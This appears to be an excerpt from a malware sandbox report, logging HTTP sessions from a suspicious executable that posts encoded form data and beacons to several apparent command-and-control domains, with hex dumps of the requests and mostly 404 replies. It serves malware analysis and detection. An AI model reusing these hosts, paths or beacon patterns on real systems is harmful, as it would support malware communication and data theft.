                                              Data Raw: 50 52 5f 78 58 72 41 3d 31 49 2b 62 6f 39 54 68 6c 45 38 47 73 75 65 47 50 30 36 55 32 42 62 61 76 52 31 4f 65 75 4e 54 65 49 4f 33 52 6d 74 34 39 59 79 52 34 33 6f 39 46 67 78 54 54 51 4e 42 55 50 70 46 34 44 53 62 70 6c 46 49 4c 4f 6b 4a 32 77 39 75 78 58 6e 78 65 43 6f 56 7a 64 79 44 4d 70 34 42 77 6a 4e 2b 6c 59 6a 63 37 2f 61 42 50 42 33 79 2b 52 30 4d 73 44 6c 74 44 6d 77 76 4c 6a 6f 4d 71 56 35 4e 51 4c 71 55 57 68 67 41 35 56 68 52 65 4f 43 35 31 50 51 6e 63 4b 6b 44 6a 7a 41 47 78 42 49 31 55 52 63 51 6d 42 2b 45 54 57 65 57 56 36 52 57 6b 68 54 6c 4a 39 51 64 73 67 34 71 36 68 6a 68 71 4a 2b 50 64 71 56 78 44 65 34 5a 46 4c 6d 68 48 32 35 77 4d 77 69 6b 72 4f 2b 45 62 46 33 53 73 49 53 77 68 78 50 77 69 58 73 4f 74 49 55 62 37 4e 39 2f 4b 4f 34 34 42 4d 54 65 44 4f 72 4e 6c 4b 4c 37 62 43 2b 56 6e 36 33 56 73 6c 54 6c 68 6a 36 35 66 41 59 35 6b 33 56 6d 6d 4b 47 67 70 36 6e 57 36 55 59 69 52 72 72 72 34 48 65 53 58 55 55 55 55 78 66 78 35 45 7a 52 57 7a 51 49 47 30 2b 56 47 6a 62 35 48 36 [TRUNCATED]
                                              Data Ascii: PR_xXrA=1I+bo9ThlE8GsueGP06U2BbavR1OeuNTeIO3Rmt49YyR43o9FgxTTQNBUPpF4DSbplFILOkJ2w9uxXnxeCoVzdyDMp4BwjN+lYjc7/aBPB3y+R0MsDltDmwvLjoMqV5NQLqUWhgA5VhReOC51PQncKkDjzAGxBI1URcQmB+ETWeWV6RWkhTlJ9Qdsg4q6hjhqJ+PdqVxDe4ZFLmhH25wMwikrO+EbF3SsISwhxPwiXsOtIUb7N9/KO44BMTeDOrNlKL7bC+Vn63VslTlhj65fAY5k3VmmKGgp6nW6UYiRrrr4HeSXUUUUxfx5EzRWzQIG0+VGjb5H6TdSam2oNWQjGm8uO3He1slqVsZQ9Hp1lPL2YQYslIGLJ6s6PGwfQ9/pDxhAjbPJ5Ux9kn4zF9/lV+R9H62aVUGaM6R4Vo6pnPxZ5Iwr4GidIs4N5cIgwt/TKNgLhNthVL+Dwk07TBYjBA/IUuWtOF5+lIBzp4p/DmBQe5k8PQ6k1hXnybwW2ry5FPX0/oqqiaRYdwM9aPnp9/MIyOztGxf1FrTCTU1kGqIo/OW9IUCoe2OxDYYbSfz171zPzr0PL9p3bnzk4m38qR6Jch+VryCIFbtSXBEMk7IDJ3AxgZJyLnqVZcy3NbgwrQoKgcpFZWjPqtSLciKhSQq/OW/S3fusSw/1dKlux20a1bMxnPz4+OAh6JpX6JwtsxN8ZBJZ0UVloa7B0I3EFflzN6TeUdtoTKwlpboBJ8JNGfWbg8UcyG2dM4LYN1iyiDH7nLiibUaykwRFqWhPkPBYmG+OlhU85BOu8sLXeZ+AbwshXt4zqcITPZXqFuBtSp0aZDjKuiq9nC3B9NLbv98F0TLKftQb20JaLdiqMdse5Tj31rjbJkmuA9ifbQzagU9Oxj0L3QRZmOAAQCx2FsKX777FCqbfnxEAjalFR5g5HL/S3Q9TmIkBekTJxBOldcBGX+rgSjA+rS2ohDGcmdReX10iF/7mvz9RXJEGbRL [TRUNCATED]
                                              Sep 25, 2024 12:47:05.797883034 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 10:47:05 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449745172.96.187.60803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:07.887039900 CEST507OUTGET /v2c3/?n0=mTk8u4lhzbnhVh&PR_xXrA=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dalong.site
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:47:08.337837934 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 10:47:08 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.4497463.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:13.400037050 CEST790OUTPOST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 56 35 70 35 44 62 36 4d 32 32 39 48 4c 39 57 37 52 53 66 2b 41 66 69 74 38 66 51 73 6e 72 7a 77 56 33 64 4c 32 30 74 42 49 6f 4a 6b 34 6b 38 6d 75 73 4b 53 56 39 6f 79 74 78 6f 53 4e 62 53 53 6d 71 7a 73 6e 47 71 34 76 6d 46 36 52 33 41 38 30 49 2b 77 57 58 55 67 78 64 49 6f 51 4a 36 57 56 56 6c 34 61 30 77 35 42 68 49 66 6f 54 34 7a 4f 46 4e 71 36 66 63 2b 42 4f 54 74 76 63 76 77 39 4c 47 4c 2b 55 45 58 49 33 66 59 6d 79 62 42 54 65 59 45 38 35 6e 51 50 67 4e 6e 74 38 30 42 64 48 53 74 63 65 56 65 79 54 42 52 31 78 65 44 57 51 59 6f 35 41 3d 3d
                                              Data Ascii: PR_xXrA=TKQUtJlMp/1FV5p5Db6M229HL9W7RSf+Afit8fQsnrzwV3dL20tBIoJk4k8musKSV9oytxoSNbSSmqzsnGq4vmF6R3A80I+wWXUgxdIoQJ6WVVl4a0w5BhIfoT4zOFNq6fc+BOTtvcvw9LGL+UEXI3fYmybBTeYE85nQPgNnt80BdHStceVeyTBR1xeDWQYo5A==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.4497473.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:15.956368923 CEST810OUTPOST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 61 35 5a 35 45 34 69 4d 2b 32 39 45 46 64 57 37 44 53 66 41 41 66 2b 74 38 65 6c 33 6b 66 66 77 55 56 46 4c 33 77 35 42 4a 6f 4a 6b 74 55 38 6e 7a 63 4b 6e 56 39 6b 4d 74 30 51 53 4e 59 75 53 6d 72 44 73 6e 56 43 37 67 57 46 6b 65 58 41 36 35 6f 2b 77 57 58 55 67 78 64 64 67 51 4a 43 57 56 6c 56 34 4c 6c 77 2b 61 42 49 63 2f 6a 34 7a 4b 46 4e 78 36 66 63 59 42 50 50 48 76 65 6e 77 39 4c 57 4c 2b 41 59 55 47 33 66 53 72 53 61 44 62 4e 6c 6a 38 71 65 52 46 43 59 42 77 39 67 4d 52 68 44 33 4e 76 30 4a 67 54 6c 69 6f 32 58 33 62 54 6c 68 69 4e 77 53 6a 58 31 72 75 6d 39 32 63 53 59 53 49 2f 57 66 75 4a 30 3d
                                              Data Ascii: PR_xXrA=TKQUtJlMp/1Fa5Z5E4iM+29EFdW7DSfAAf+t8el3kffwUVFL3w5BJoJktU8nzcKnV9kMt0QSNYuSmrDsnVC7gWFkeXA65o+wWXUgxddgQJCWVlV4Llw+aBIc/j4zKFNx6fcYBPPHvenw9LWL+AYUG3fSrSaDbNlj8qeRFCYBw9gMRhD3Nv0JgTlio2X3bTlhiNwSjX1rum92cSYSI/WfuJ0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.4497483.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:18.498404026 CEST10892OUTPOST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 61 35 5a 35 45 34 69 4d 2b 32 39 45 46 64 57 37 44 53 66 41 41 66 2b 74 38 65 6c 33 6b 65 4c 77 56 67 5a 4c 32 58 46 42 62 59 4a 6b 73 55 38 36 7a 63 4b 36 56 39 73 41 74 30 4d 73 4e 64 71 53 6e 49 62 73 32 30 43 37 37 6d 46 6b 63 58 41 2f 30 49 2b 6c 57 58 6b 6b 78 64 4e 67 51 4a 43 57 56 6e 4e 34 62 45 77 2b 64 78 49 66 6f 54 34 42 4f 46 4d 2f 36 66 46 6a 42 50 62 39 76 50 48 77 38 76 4b 4c 38 7a 77 55 4b 33 66 63 34 69 61 68 62 4e 70 38 38 71 43 6e 46 48 6c 6b 77 39 55 4d 52 6e 4f 36 5a 50 67 70 30 41 35 51 36 33 7a 54 44 7a 74 74 75 76 38 58 74 33 5a 4f 35 31 46 35 54 6a 78 4f 4d 36 57 62 34 4f 73 46 58 71 76 5a 51 36 5a 78 31 61 54 2b 79 38 4e 33 46 74 4a 46 71 68 53 55 6c 67 79 51 69 44 4b 75 56 61 69 6e 63 70 42 34 55 45 74 44 4c 68 50 78 44 2b 49 68 46 6f 30 69 7a 76 6c 43 4c 37 52 61 64 41 42 37 49 4c 35 4a 47 46 57 49 37 64 58 4a 6a 6f 63 30 38 63 62 57 44 4c 54 41 41 76 71 34 69 6b 69 58 74 75 4c 42 54 43 32 4b 65 64 55 6d 52 69 [TRUNCATED]
                                              Data Ascii: PR_xXrA=TKQUtJlMp/1Fa5Z5E4iM+29EFdW7DSfAAf+t8el3keLwVgZL2XFBbYJksU86zcK6V9sAt0MsNdqSnIbs20C77mFkcXA/0I+lWXkkxdNgQJCWVnN4bEw+dxIfoT4BOFM/6fFjBPb9vPHw8vKL8zwUK3fc4iahbNp88qCnFHlkw9UMRnO6ZPgp0A5Q63zTDzttuv8Xt3ZO51F5TjxOM6Wb4OsFXqvZQ6Zx1aT+y8N3FtJFqhSUlgyQiDKuVaincpB4UEtDLhPxD+IhFo0izvlCL7RadAB7IL5JGFWI7dXJjoc08cbWDLTAAvq4ikiXtuLBTC2KedUmRicWtFz8gbeidxyyOQQS4vyhMEhVdJQlc46YdKBSMc3ea3rxhHaZ70UYUDeYDagCy7Lf7nMaz0kpp+my+BsQygnAXSEXyievW/FwtkaVGmIfx1iET16UTMyhELTK5C4tv0OL+QjkEx4JqCj7N9qO00SKjPbAw0KhLkB5lOfPEv7Hmp1w/PLp+8/JLgEwKv2P8LG45zG2x1kI6e795ivoFKYHLUe6670ZjdUJwwf6SrTc4ElB2U4ICuG+oFLE0WLk5lcOo01/xFiZLqduXf+y88cCE/YVQMdCtY+2mVrJ1oGdEYwnG7+S0wpix3Zw99kU6tSVGNH3ubcYLQGaThLh/1QcNezdRSclH5z4IGYZ19gDF5ewZtqMcrBRlBWz9NVH3SXcmYxA/dM7GO0LNUTWbSPfSdU4frEIZJN1xmDfX73hwPXZfdi3yVhdMhqi9i7ACvjHlqYfNzmxvM+PhRh4pJsUKWMGtFbajBs+Zb0u+BJUoQWOYK4w5Us337UA3s62CQRDtDPWP6q7ULOiRh4wsDe3NYmp6/QarwJowHaWcGF+qPw0xUxMrA+5oraMJNeR3ochnkSCUjjagwSCWkt0yRs5RGzMzk0KU+0TkEZWJNiSsqtw21rx2ccEg3D3AiZ4UTFBsR1RZuF5Ou/gyqMem8ht6m8rvBwdsJXB [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.4497493.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:21.065594912 CEST516OUTGET /xamn/?PR_xXrA=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mgeducacaopro.online
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:47:21.516455889 CEST401INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 25 Sep 2024 10:47:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 261
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 50 52 5f 78 58 72 41 3d 65 49 34 30 75 2b 6b 58 6c 36 64 43 4e 4f 78 75 46 4b 62 43 69 67 52 31 4e 38 36 6d 45 67 66 4b 58 50 6e 41 32 6f 52 56 68 35 37 63 62 31 46 4f 79 77 35 61 63 4b 74 31 75 53 56 6b 72 74 4f 47 65 50 55 43 6e 6c 55 51 49 4a 53 37 6b 5a 6a 61 68 53 57 52 36 52 31 61 64 46 6f 70 75 63 57 44 45 32 68 61 36 2f 73 31 50 50 58 44 59 69 70 36 63 46 49 64 44 48 59 3d 26 6e 30 3d 6d 54 6b 38 75 34 6c 68 7a 62 6e 68 56 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PR_xXrA=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&n0=mTk8u4lhzbnhVh"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.44975067.223.117.189803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:26.743124962 CEST766OUTPOST /fava/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.heldhold.xyz
                                              Origin: http://www.heldhold.xyz
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.heldhold.xyz/fava/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 30 5a 50 59 48 74 39 58 66 65 4c 57 76 59 67 6e 62 51 70 47 34 43 52 46 53 73 39 76 56 39 51 56 46 6f 43 59 4c 41 78 41 6f 62 52 50 6e 6e 39 75 49 77 71 33 4a 77 37 66 44 42 32 4a 37 6b 4a 30 70 70 51 33 73 38 47 66 6a 51 50 6b 35 4f 64 4e 44 4f 4f 6a 57 4a 4b 6f 67 63 64 37 45 46 54 49 2f 74 51 64 5a 71 46 59 4b 77 36 78 7a 36 6e 47 50 4a 39 78 63 4f 32 66 76 51 71 58 74 2f 67 5a 76 67 78 71 43 53 73 45 44 44 2f 53 37 65 49 45 45 74 61 64 75 44 68 73 51 53 31 67 63 52 34 54 76 31 42 77 55 4c 67 42 37 6b 42 53 4f 66 4d 2f 5a 6c 4e 76 51 3d 3d
                                              Data Ascii: PR_xXrA=LAr5q9LyWuo5N0ZPYHt9XfeLWvYgnbQpG4CRFSs9vV9QVFoCYLAxAobRPnn9uIwq3Jw7fDB2J7kJ0ppQ3s8GfjQPk5OdNDOOjWJKogcd7EFTI/tQdZqFYKw6xz6nGPJ9xcO2fvQqXt/gZvgxqCSsEDD/S7eIEEtaduDhsQS1gcR4Tv1BwULgB7kBSOfM/ZlNvQ==
                                              Sep 25, 2024 12:47:27.411669016 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:47:27 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 25, 2024 12:47:27.411685944 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                              Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                              Sep 25, 2024 12:47:27.411695957 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                              Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                              Sep 25, 2024 12:47:27.411706924 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                              Sep 25, 2024 12:47:27.411719084 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                                              Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
